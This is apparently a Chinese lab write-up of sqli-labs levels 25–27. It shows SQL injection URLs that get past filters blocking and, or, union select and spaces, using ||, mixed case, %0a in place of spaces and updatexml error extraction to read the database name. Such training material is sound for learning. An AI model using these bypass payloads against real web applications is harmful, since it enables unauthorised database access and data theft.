20、绕过去除and、or、union select、空格的sql注入

简介: 20、绕过去除and、or、union select、空格的sql注入

环境sqli-labs

less 25

1、输入特殊字符,报错

http://192.168.1.121/sqli/Less-25/?id=1

0a2653c851af460fa595bd959398a8f1.png

2、单引号闭合

0eacb84100b54626af849e6b562bf92a.png

3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1’ or1=1 --+

2d65d23f6d4748949b924e4057485923.png

http://192.168.1.121/sqli/Less-25/?id=1’ || 1=1 --+

2e9b90b2ca334476abebe75bafe6eeaa.png

less 26

一、输入特殊字符,看报错信息

http://192.168.1.121/sqli/Less-26/?id=1

0a2653c851af460fa595bd959398a8f1.png

二、闭合语句没有效果,屏蔽了-,空格,or等等

http://192.168.1.121/sqli/Less-26/?id=1’ --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1’ ||‘a’='a

0eacb84100b54626af849e6b562bf92a.png

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1’||updatexml(1,concat(’$’,(database())),0)||‘1’=‘1

2d65d23f6d4748949b924e4057485923.png

less 27

一、输入特殊字符,报错

http://192.168.1.121/sqli/Less-27/?id=1

0a2653c851af460fa595bd959398a8f1.png

二、由于过滤了特殊符号,构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1’ ||'1

0eacb84100b54626af849e6b562bf92a.png

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1’ union select 1,2,3 ||'1

2d65d23f6d4748949b924e4057485923.png

union、select屏蔽了,空格也屏蔽了

四、union.select大小写替换一下,空格用/%0a/替换

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,2,3%20||'1

2e9b90b2ca334476abebe75bafe6eeaa.png

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,database(),3||'1

4cebaac233b3433da32a72337a77fc60.png

禁止非法,后果自负

目录
相关文章
|
29天前
|
SQL 监控 安全
SQL注入的实现原理以及防止
SQL注入的实现原理以及防止
|
27天前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
30 0
|
1月前
|
SQL 存储 关系型数据库
SQL的基本语法以及SQL语句的关键字的使用,SELECT、INSERT、UPDATE、DELETE、CREATE、ALTER、DROP等。
SQL的基本语法以及SQL语句的关键字的使用,SELECT、INSERT、UPDATE、DELETE、CREATE、ALTER、DROP等。
|
29天前
|
SQL 安全 测试技术
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
14 0
|
1月前
|
SQL 安全 API
|
2月前
|
SQL JSON 数据库
常见的sql注入类型闭合及符号
常见的sql注入类型闭合及符号
31 0
|
2月前
|
SQL 数据库 数据安全/隐私保护
sql注入碰到加密数据怎么办
sql注入碰到加密数据怎么办
18 1
|
2月前
|
SQL 数据库
SQL注入基础(报错注入及延时注入)
SQL注入基础(报错注入及延时注入)
22 0
|
2月前
|
SQL
14、sql注入绕过技术
14、sql注入绕过技术
27 0
|
5天前
|
SQL 人工智能 算法
【SQL server】玩转SQL server数据库:第二章 关系数据库
【SQL server】玩转SQL server数据库:第二章 关系数据库
40 10